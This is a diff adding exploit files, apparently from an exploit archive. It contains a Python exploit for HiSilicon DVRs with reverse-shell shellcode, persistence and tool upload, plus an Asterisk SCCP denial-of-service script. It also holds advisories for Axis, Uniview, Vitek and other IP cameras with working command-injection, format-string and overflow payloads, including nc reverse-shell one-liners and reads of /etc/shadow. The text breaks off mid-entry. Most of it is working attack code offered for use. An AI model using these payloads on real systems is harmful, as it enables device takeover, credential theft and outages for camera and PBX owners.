|
||||
import os
|
||||
|
||||
parser = argparse.ArgumentParser(description='exploit HiSilicon DVR devices')
|
||||
parser.add_argument('--rhost', help='target host', required=True)
|
||||
parser.add_argument('--rport', help='target port', default=80)
|
||||
parser.add_argument('--lhost', help='connectback ip', required=True)
|
||||
parser.add_argument('--lport', help='connectback port', default=31337)
|
||||
parser.add_argument('--bhost', help='listen ip to bind (default: connectback)')
|
||||
parser.add_argument('--bport', help='listen port to bind (default: connectback)')
|
||||
parser.add_argument('-n', '--nolisten', help='do not start listener (you should care about connectback listener on your own)', action='store_true')
|
||||
parser.add_argument('-i', '--interactive', help='select stack memory region interactively (rather than using autodetection)', action='store_true')
|
||||
parser.add_argument('-p', '--persistent', help='make connectback shell persistent by restarting dvr app automatically (DANGEROUS!)', action='store_true')
|
||||
parser.add_argument('-u', '--upload', help='upload tools (now hardcoded "./tools/dropbear" in script) after pwn', action='store_true')
|
||||
parser.add_argument('--offset', help='exploit param stack offset to mem page base (default: 0x7fd3d8)', default=0x7fd3d8)
|
||||
parser.add_argument('--cmdline', help='cmdline of Sofia binary on remote target (default "/var/Sofia")', default='/var/Sofia')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
target_host = args.rhost
|
||||
target_port = int(args.rport)
|
||||
|
||||
sofia_cmdline = args.cmdline
|
||||
|
||||
if args.interactive:
|
||||
getleak_interactive = True
|
||||
else:
|
||||
getleak_interactive = False
|
||||
|
||||
if args.persistent:
|
||||
shell_persistent = True
|
||||
else:
|
||||
shell_persistent = False
|
||||
|
||||
if args.upload:
|
||||
shell_upload = True
|
||||
else:
|
||||
shell_upload = False
|
||||
|
||||
connectback_host = args.lhost
|
||||
connectback_port = int(args.lport)
|
||||
|
||||
if args.bhost:
|
||||
listen_host = args.bhost
|
||||
else:
|
||||
listen_host = connectback_host
|
||||
if args.bport:
|
||||
listen_port = int(args.bport)
|
||||
else:
|
||||
listen_port = connectback_port
|
||||
|
||||
|
||||
"""
|
||||
vuln1: bof in httpd
|
||||
-------------------
|
||||
buffer overflow in builtin webserver binary `Sofia`
|
||||
which can be exploited to run shellcode (as root) on the device.
|
||||
|
||||
PoC payload to cause a segfault:
|
||||
payload = "GET " + "a"*299 + "xxxx" + " HTTP"
|
||||
|
||||
note, that in "xxxx" we can control pc register (program flow)!
|
||||
|
||||
there is no nx enabled, so executing shellcode in place of "a"*299
|
||||
is possible. however, stack address leak is needed to defeat aslr.
|
||||
|
||||
vuln2: path traversal vuln in httpd
|
||||
-----------------------------------
|
||||
builtin webserver has a directory path traversal vulnerability
|
||||
which can be exploited to leak arbitrary files.
|
||||
note, that the webserver binary `Sofia` is running as root,
|
||||
so exploiting this arbitrary file can be read from device fs.
|
||||
|
||||
PoC request "GET ../../etc/passwd HTTP" reads file "/etc/passwd".
|
||||
Furthermore, dir listing is enabled as well.
|
||||
|
||||
by exploiting vuln2 we can defeat aslr needed to exploit vuln1.
|
||||
namely, filesystem at /proc contains lots of information
|
||||
about running processes, e.g. contains memory mappings:
|
||||
request "GET ../../proc/[pid]/maps HTTP" reads memory
|
||||
mapping of process with pid [pid]. obverving the memory
|
||||
mapping patterns usually enough to defeat aslr (offset
|
||||
from mem map base is the same, even in different versions).
|
||||
"""
|
||||
|
||||
# get pid of running dvr binary '/var/Sofia'
|
||||
def findpid():
|
||||
with log.progress('getting pidlist') as logp:
|
||||
c = context.log_level
|
||||
context.log_level = 'error'
|
||||
r = remote(target_host, target_port)
|
||||
r.sendline('GET ../../proc HTTP')
|
||||
pids = []
|
||||
for line in r.recvall().splitlines():
|
||||
res = re.match(r'.*\.\./\.\./proc/([0-9]+)"', line)
|
||||
if res:
|
||||
pids.append(int(res.group(1)))
|
||||
r.close()
|
||||
context.log_level = c
|
||||
logp.success('found %d processes' % len(pids))
|
||||
|
||||
with log.progress("searching for PID of '%s'" % sofia_cmdline) as logp:
|
||||
pid_sofia = None
|
||||
pids.sort(reverse=True)
|
||||
for pid in pids:
|
||||
logp.status(str(pid))
|
||||
c = context.log_level
|
||||
context.log_level = 'error'
|
||||
r = remote(target_host, target_port)
|
||||
r.sendline('GET ../../proc/%d/cmdline HTTP' % pid)
|
||||
resp = r.recvall().splitlines()
|
||||
r.close()
|
||||
context.log_level = c
|
||||
if sofia_cmdline + '\x00' == resp[-1]:
|
||||
pid_sofia = pid
|
||||
logp.success(str(pid_sofia))
|
||||
break
|
||||
if not pid_sofia:
|
||||
logp.failure('did not found')
|
||||
|
||||
return pid_sofia
|
||||
|
||||
def getmodelnumber():
|
||||
c = context.log_level
|
||||
context.log_level = 'error'
|
||||
r = remote(target_host, target_port)
|
||||
r.sendline('GET ../../mnt/custom/ProductDefinition HTTP')
|
||||
for l in r.recvall(timeout=5).decode('ascii').replace(',', '\n').splitlines():
|
||||
if "Hardware" in l:
|
||||
modelnumber = l.split(":")[1].split('"')[1]
|
||||
r.close()
|
||||
context.log_level = c
|
||||
return modelnumber
|
||||
|
||||
def guessregion(smaps):
|
||||
for t in range(len(smaps)-7, 1, -1):
|
||||
if (smaps[t][1][0], smaps[t+1][1][0], smaps[t+2][1][0], smaps[t+3][1][0], smaps[t+4][1][0], smaps[t+5][1][0], smaps[t+6][1][0]) == (8188, 8188, 8188, 8188, 8188, 8188, 8188) and smaps[t][1][1] == 4 and smaps[t+1][1][1] == 4 and smaps[t+2][1][1] == 4 and smaps[t+3][1][1] >= 8 and smaps[t+4][1][1] >= 4 and smaps[t+5][1][1] >= 4 and smaps[t+6][1][1] >= 8:
|
||||
return (t+3)
|
||||
return (-1)
|
||||
|
||||
# getting stack section base address
|
||||
# 'k' defines the section which contains the stack
|
||||
def getleak(pid, interactive):
|
||||
with log.progress("getting stack section base") as logp:
|
||||
c = context.log_level
|
||||
context.log_level = 'error'
|
||||
r = remote(target_host, target_port)
|
||||
r.sendline('GET ../../proc/%d/smaps HTTP' % pid)
|
||||
smaps = []
|
||||
memStart = False
|
||||
for line in r.recvall().splitlines():
|
||||
if memStart:
|
||||
t += (int(line.split()[1]),)
|
||||
i += 1
|
||||
#if i >= 14:
|
||||
if i >= 7:
|
||||
smaps.append((memStart, t))
|
||||
memStart = False
|
||||
if 'rwxp' in line:
|
||||
memStart = int(line.split('-')[0], 16)
|
||||
i = 0
|
||||
t = ()
|
||||
guess = guessregion(smaps)
|
||||
if guess < 0 or interactive:
|
||||
j = 0
|
||||
for i in smaps:
|
||||
print (j, hex(i[0]), i[1:])
|
||||
j += 1
|
||||
k = int(raw_input('enter stack region id (guessed value = %d): ' % guess))
|
||||
else:
|
||||
k = guess
|
||||
leak = smaps[k][0]
|
||||
r.close()
|
||||
context.log_level = c
|
||||
logp.success(hex(leak))
|
||||
return leak
|
||||
|
||||
# connectback shellcode
|
||||
# badchars: 0x00, 0x0d, 0x20, 0x3f, 0x26
|
||||
def shellcode(lhost, lport):
|
||||
badchars = [0x00, 0x0d, 0x20, 0x3f, 0x26]
|
||||
badchars = map(chr, badchars)
|
||||
|
||||
xscode = "01108fe211ff"
|
||||
xscode += "2fe111a18a78013a8a700221081c0121921a0f02193701df061c0ba10223"
|
||||
xscode += "0b801022023701df3e270137c821301c01df0139fbd507a0921ac27105b4"
|
||||
xscode += "69460b2701df0121081c01dfc046ffff7a69c0a858642f62696e2f736858"
|
||||
xscode += "ffffc046efbeadde"
|
||||
|
||||
h = lambda x: hex(int(x))[2:]
|
||||
h2 = lambda x: h(x).zfill(2)
|
||||
xscode = xscode[:164] + h(lport+0x100).zfill(4) + ''.join(map(h2, lhost.split('.'))) + xscode[176:]
|
||||
xscode = xscode.decode('hex')
|
||||
for badchar in badchars:
|
||||
if badchar in xscode:
|
||||
raise NameError('badchar %s in shellcode!' % hex(ord(badchar)))
|
||||
return xscode
|
||||
|
||||
def restart_dvrapp(c):
|
||||
with log.progress('restarting dvr application') as logp:
|
||||
logp.status('looking up dvrhelper process')
|
||||
c.sendline('ps')
|
||||
cmdline = ''
|
||||
while not 'dvrHelper' in cmdline:
|
||||
cmdline = c.recvline()
|
||||
cmdline = cmdline.split()
|
||||
while not 'ps' in c.recvline():
|
||||
pass
|
||||
sleep(1)
|
||||
logp.status('killing dvrhelper')
|
||||
c.sendline('kill %s' % cmdline[0])
|
||||
sleep(1)
|
||||
cmdline_dvrhelper = ' '.join(cmdline[4:])
|
||||
logp.status('starting dvrhelper: %s' % cmdline_dvrhelper)
|
||||
c.sendline(cmdline_dvrhelper + ' 2>/dev/null &')
|
||||
sleep(1)
|
||||
c.recvuntil(sofia_cmdline)
|
||||
c.recvline()
|
||||
|
||||
def upload_tools(c):
|
||||
with log.progress('uploading tools to /var/.tools') as logp:
|
||||
logp.status('creating dir')
|
||||
c.sendline('rm -fr /var/.tools')
|
||||
sleep(1)
|
||||
c.sendline('mkdir /var/.tools')
|
||||
sleep(1)
|
||||
tools = ['dropbear']
|
||||
upload_blocksize = 1024
|
||||
for tool in tools:
|
||||
toolsize = os.path.getsize('./tools/%s' % tool)
|
||||
b = 0
|
||||
fp = open("./tools/%s" % tool, "rb")
|
||||
for chunk in iter(lambda: fp.read(upload_blocksize), ''):
|
||||
chunkhex = ''.join(['\\x'+chunk.encode('hex')[i:i+2].zfill(2) for i in range(0, len(chunk)*2, 2)])
|
||||
c.sendline("echo -n -e '%s' >> /var/.tools/%s" % (chunkhex, tool))
|
||||
b += len(chunk)
|
||||
logp.status('%s: %d/%d' % (tool, b, toolsize))
|
||||
sleep(0.1)
|
||||
fp.close()
|
||||
c.sendline('chmod +x /var/.tools/%s' % tool)
|
||||
sleep(1)
|
||||
logp.success(' '.join(tools))
|
||||
|
||||
log.info('target is %s:%d' % (target_host, target_port))
|
||||
|
||||
if not args.nolisten:
|
||||
log.info('connectback on %s:%d' % (listen_host, listen_port))
|
||||
|
||||
with log.progress("assembling shellcode") as logp:
|
||||
xscode = shellcode(connectback_host, connectback_port)
|
||||
logp.success("done. length is %d bytes" % len(xscode))
|
||||
|
||||
with log.progress("identifying model number") as logp:
|
||||
modelnumber = getmodelnumber()
|
||||
logp.success(modelnumber)
|
||||
|
||||
log.info('exploiting dir path traversal of web service to get leak addresses')
|
||||
stack_section_base = getleak(findpid(), getleak_interactive)
|
||||
stack_offset = args.offset
|
||||
stack_20 = stack_section_base + stack_offset + 20
|
||||
|
||||
log.info('shellcode address is ' + hex(stack_20))
|
||||
|
||||
payload = "GET "
|
||||
payload += xscode
|
||||
payload += "a" * (299 - len(xscode))
|
||||
payload += p32(stack_20)
|
||||
payload += " HTTP"
|
||||
|
||||
log.info('exploiting buffer overflow in web service url path')
|
||||
log.info('remote shell should gained by connectback shellcode!')
|
||||
|
||||
if not args.nolisten:
|
||||
l = listen(bindaddr=listen_host, port=listen_port, timeout=5)
|
||||
c = l.wait_for_connection()
|
||||
|
||||
r = remote(target_host, target_port)
|
||||
r.sendline(payload)
|
||||
r.recvall(timeout=5)
|
||||
r.close()
|
||||
|
||||
if not args.nolisten:
|
||||
if shell_persistent:
|
||||
restart_dvrapp(c)
|
||||
|
||||
if shell_upload:
|
||||
upload_tools(c)
|
||||
|
||||
c.interactive()
|
80
exploits/multiple/dos/43992.py
Executable file
80
exploits/multiple/dos/43992.py
Executable file
|
@ -0,0 +1,80 @@
|
|||
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
|
||||
# Vulnerability found using Exploit Pack v10 - Fuzzer module
|
||||
# CVE-2017-17090 - AST-2017-013
|
||||
#
|
||||
# Tested on: Asterisk 13.17.2~dfsg-2
|
||||
#
|
||||
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
|
||||
# The vulnerability is due to an error when the vulnerable application
|
||||
# handles crafted SCCP packet. A remote attacker may be able to exploit
|
||||
# this to cause a denial of service condition on the affected system.
|
||||
#
|
||||
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
|
||||
# helper thread: Cannot allocate memory
|
||||
#
|
||||
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
|
||||
# sense, middleware between Internet and telephony channels on the bottom,
|
||||
# and Internet and telephony applications at the top.
|
||||
#
|
||||
# Homepage: http://www.asterisk.org/
|
||||
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
|
||||
#
|
||||
# Example usage: python asteriskSCCP.py 192.168.1.1 2000
|
||||
|
||||
import binascii
|
||||
import sys
|
||||
import socket
|
||||
import time
|
||||
|
||||
def asteriskSCCP(target,port):
|
||||
try:
|
||||
while 1:
|
||||
# Open socket
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
# Set reuse ON
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
# Bind port
|
||||
s.connect((target, port))
|
||||
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
|
||||
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
|
||||
packet =
|
||||
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')
|
||||
|
||||
# Log the packet in hexa and timestamp
|
||||
fileLog = target + ".log"
|
||||
logPacket = open(fileLog, "w+")
|
||||
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
|
||||
logPacket.close()
|
||||
|
||||
# Write bytecodes to socket
|
||||
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
|
||||
s.send(bytes(packet))
|
||||
# Packet sent:
|
||||
print(bytes(packet))
|
||||
try:
|
||||
data = s.recv(4096)
|
||||
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
|
||||
except socket.error, e:
|
||||
print 'Sorry, No data available'
|
||||
continue
|
||||
s.close()
|
||||
except socket.error as error:
|
||||
print error
|
||||
print "Sorry, something went wrong!"
|
||||
|
||||
def howtouse():
|
||||
print "Usage: AsteriskSCCP.py Hostname Port"
|
||||
print "[*] Mandatory arguments:"
|
||||
print "[-] Specify a hostname / port"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
# Set target
|
||||
target = sys.argv[1]
|
||||
port = int(sys.argv[2])
|
||||
|
||||
print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
|
||||
asteriskSCCP(target, port)
|
||||
except IndexError:
|
||||
howtouse()
|
123
exploits/multiple/dos/43998.txt
Normal file
123
exploits/multiple/dos/43998.txt
Normal file
|
@ -0,0 +1,123 @@
|
|||
[STX]
|
||||
|
||||
Subject: Remote Stack Format String in 'nsd' binary from multiple OEM
|
||||
|
||||
Attack vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
Researcher: bashis <mcw noemail eu> (December 2017)
|
||||
PoC: https://github.com/mcw0/PoC
|
||||
Release date: December 14, 2017
|
||||
Full Disclosure: 0-Day
|
||||
|
||||
|
||||
-[ PoC ]-
|
||||
|
||||
1)
|
||||
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'
|
||||
|
||||
[...]
|
||||
function initHideWidget(){
|
||||
document.getElementById("devip").value = "192.168.57.20";
|
||||
document.getElementById("cameraid").value = 1;
|
||||
document.getElementById("streamid").value = 1;
|
||||
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
|
||||
document.getElementById("lg").value = "BBBB";
|
||||
document.getElementById("port").value = 60000;
|
||||
document.getElementById("ipver").value = 1;
|
||||
document.getElementById("tprotocol").value = 2;
|
||||
document.getElementById("devtype").value = 1;
|
||||
document.getElementById("ismotorize").value = 1;
|
||||
|
||||
[...]
|
||||
Note: 'BBBB' are hiding within '5e3006db'
|
||||
|
||||
2)
|
||||
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
|
||||
[...]
|
||||
function initHideWidget(){
|
||||
document.getElementById("ip").value = "192.168.57.20";
|
||||
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
|
||||
document.getElementById("port").value = 60000;
|
||||
document.getElementById("ipver").value = 1;
|
||||
document.getElementById("tprotocol").value = 2;
|
||||
document.getElementById("devtype").value = 1;
|
||||
[...]
|
||||
|
||||
|
||||
-[ Affected OEM ]-
|
||||
|
||||
Huatu
|
||||
I-View
|
||||
IP Camera Web Service
|
||||
Stanley Security
|
||||
3D Eyes CCTV Platform
|
||||
Protech Srl
|
||||
LS vision
|
||||
GWSECU
|
||||
12 Legion Solution
|
||||
HDVuk IP Camera
|
||||
Intervid Security
|
||||
Suzuki Tech
|
||||
Wellsite IP Camera
|
||||
iBrido
|
||||
Protec IP Camera
|
||||
Maxtron IP Camera
|
||||
Ascendent
|
||||
GTvs IP Camera
|
||||
Squilla
|
||||
Bikal IP Camera
|
||||
MW Power
|
||||
Alfa Vision
|
||||
KMA Security
|
||||
Tough Dog Security
|
||||
Kpro HQ
|
||||
Lanetwork
|
||||
AFM Vision
|
||||
ZetaDo
|
||||
Jobsight Inc.
|
||||
Datalab IP Technologies
|
||||
4Tvision
|
||||
Proline UK
|
||||
Tanz
|
||||
Aisonic
|
||||
HD-IP
|
||||
PreSec Security Solution
|
||||
EagleVision
|
||||
Elemis Delta
|
||||
Imenara
|
||||
Gigamedia
|
||||
Xavee
|
||||
Honeywell
|
||||
Boss Security
|
||||
A.R.T Surveillance
|
||||
Global Security
|
||||
Securicorp
|
||||
Securetech
|
||||
Vapplica
|
||||
Star
|
||||
Stic
|
||||
NeXus
|
||||
Alnet
|
||||
Spy Smart
|
||||
Kompsos
|
||||
Adler Security Systems
|
||||
Nextan
|
||||
Access
|
||||
Toprotect
|
||||
Kawah
|
||||
LS StrateX
|
||||
Senpei CCTV
|
||||
Metcom
|
||||
AFM Vision
|
||||
Doron Technologies
|
||||
Saviour Smart IoT Systems
|
||||
Eagle-Eye
|
||||
Faucon.at
|
||||
BlueEagle Security
|
||||
Campro
|
||||
Opple
|
||||
Level One
|
||||
Video and Monitor System
|
||||
K&D
|
||||
|
||||
[ETX]
|
28
exploits/multiple/remote/43984.txt
Normal file
28
exploits/multiple/remote/43984.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
[STX]
|
||||
|
||||
Subject: SSI Remote Execute and Read Files
|
||||
Researcher: bashis <mcw noemail eu> (August 2016)
|
||||
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
|
||||
|
||||
Attack Vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
Conditions: The cam must be configure to allow anonymous view
|
||||
|
||||
Execute remote commands (PoC: Connect back shell):
|
||||
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
|
||||
|
||||
Notes:
|
||||
<CONNECT BACK IP> = LHOST IP
|
||||
<CONNECT BACK PORT> = LHOST PORT
|
||||
<TARGET IP> = RHOST IP
|
||||
<TARGET PORT> RHOST PORT
|
||||
|
||||
|
||||
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
|
||||
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
|
||||
|
||||
Notes:
|
||||
<TARGET IP> = RHOST IP
|
||||
<TARGET PORT> RHOST PORT
|
||||
|
||||
[ETX]
|
89
exploits/multiple/remote/43985.txt
Normal file
89
exploits/multiple/remote/43985.txt
Normal file
|
@ -0,0 +1,89 @@
|
|||
[STX]
|
||||
|
||||
Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.
|
||||
|
||||
Attack vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
Researcher: bashis <mcw noemail eu> (August 2017)
|
||||
PoC: https://github.com/mcw0/PoC
|
||||
Release date: December 1, 2017
|
||||
Full Disclosure: 90 days (due to the large volume of affected devices)
|
||||
|
||||
heap: Non-Executable + ASLR
|
||||
stack: Non-Executable + ASLR
|
||||
|
||||
Axis Vulnerability ID: ACV-120444
|
||||
|
||||
Vulnerable: MPQT series < v7.20.x/6.50.1.2
|
||||
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)
|
||||
|
||||
Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
|
||||
Not vulnerable (Releases from October to November 2017):
|
||||
|
||||
1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
|
||||
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)
|
||||
|
||||
[Note]
|
||||
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
|
||||
https://www.axis.com/global/en/support/firmware
|
||||
https://www.axis.com/global/en/support/product-security
|
||||
|
||||
|
||||
Timeline:
|
||||
August 31, 2017: Initiated contact with Axis
|
||||
September 1, 2017: Response from Axis
|
||||
September 5, 2017: ACK of findings from Axis
|
||||
September 9, 2017: Received first test image from Axis to verify fix
|
||||
September 28, 2017: Received first advisory draft from Axis
|
||||
November 15-27, 2017: Coordination with Axis for Full Disclosure
|
||||
December 1, 2017: Full Disclosure
|
||||
|
||||
-[General Information]-
|
||||
"CGI_decode" in /usr/lib/libcgiparser.so suffers from a bug in the handling URL decode of '%xx'.
|
||||
The CGI_decode does not check the size of what it is about to decode, it always assumes "%" plus two chars.
|
||||
|
||||
By supplying only one single '%', 'CGI_decode' will try to URL decode [% + NULL + Next char], which lead to the return of a longer string than expected as the new string will be read until the next NULL. ([NULL string termination + Next char] are replaced with one '?')
|
||||
|
||||
-[Information leakage]-
|
||||
|
||||
The "%"" in "GET /index.shtml?size=%"" triggers both "information disclosure" and "heap overflow", depending on how it will be used.
|
||||
|
||||
[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
|
||||
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80
|
||||
|
||||
[Result]
|
||||
...
|
||||
var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
|
||||
...
|
||||
|
||||
|
||||
-[Heap Overflow]-
|
||||
|
||||
To trigger the heap overflow we need to send ~20KB amount of data that would normally not be accepted by the Web server.
|
||||
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send max 8162 bytes in each of them.
|
||||
|
||||
[Note]
|
||||
Without the information leakage bug above, the realloc() will never be triggered regardless how much data is sent.
|
||||
|
||||
[PoC]
|
||||
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80
|
||||
|
||||
[Result]
|
||||
/var/log/info.log
|
||||
2017-05-08T08:22:23.801+00:00 axis [ INFO ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***
|
||||
|
||||
-[Vulnerable binaries]-
|
||||
|
||||
/bin/ssid (Server Side Include Daemon)
|
||||
/bin/urldecode (URL Command Line Tool)
|
||||
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
|
||||
/usr/bin/wsd (Web Service Dispatch Daemon)
|
||||
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)
|
||||
|
||||
/usr/lib/libwsevent.so
|
||||
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)
|
||||
|
||||
Have a nice day
|
||||
/bashis
|
||||
|
||||
[ETX]
|
34
exploits/multiple/remote/43999.txt
Normal file
34
exploits/multiple/remote/43999.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
[STX]
|
||||
|
||||
Subject: Uniview RCE and export config PoC
|
||||
Researcher: bashis <mcw noemail eu> (October 2017)
|
||||
|
||||
Attack Vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
|
||||
[Export config]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}
|
||||
|
||||
-[tcpdump]-
|
||||
|
||||
[check active capture]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":263,"szUserName":"","u32UserLoginHandle":-1}
|
||||
|
||||
[start capture]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}
|
||||
|
||||
[stop capture]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":0,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}
|
||||
|
||||
[download capture]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}
|
||||
|
||||
-[Remote Command Execution]-
|
||||
|
||||
[Get /etc/shadow]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":";cp%20/etc/shadow%20/tmp/packetcapture.pcap;"}
|
||||
|
||||
[get the result]
|
||||
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}
|
||||
|
||||
[ETX]
|
201
exploits/multiple/remote/44000.txt
Normal file
201
exploits/multiple/remote/44000.txt
Normal file
|
@ -0,0 +1,201 @@
|
|||
[STX]
|
||||
|
||||
Subject: Vitek RCE and Information Disclosure (and possible other OEM)
|
||||
|
||||
Attack vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
Researcher: bashis <mcw noemail eu> (December 2017)
|
||||
PoC: https://github.com/mcw0/PoC
|
||||
Release date: December 22, 2017
|
||||
Full Disclosure: 0-day
|
||||
|
||||
heap: Executable + Non-ASLR
|
||||
stack: Executable + ASLR
|
||||
|
||||
-[Manufacture Logo]-
|
||||
_ _ _ _ _ _ _ _ _ _ _ _
|
||||
\ _ _ _ _ _ ___
|
||||
/ /__/ \ |_/
|
||||
/ __ / - _ ___
|
||||
/ / / / / /
|
||||
_ _ _ _/ / / \_/ \_ ______
|
||||
___________\___\__________________
|
||||
|
||||
|
||||
-[OEM (found in the code)]-
|
||||
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
|
||||
Thrive
|
||||
Wisecon
|
||||
Sanyo
|
||||
Inodic
|
||||
CBC
|
||||
Elbex
|
||||
Y3K
|
||||
KTNC
|
||||
|
||||
|
||||
-[Stack Overflow RCE]-
|
||||
|
||||
[Reverse netcat shell]
|
||||
|
||||
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81
|
||||
|
||||
[Listener]
|
||||
|
||||
$ ncat -vlp 31337
|
||||
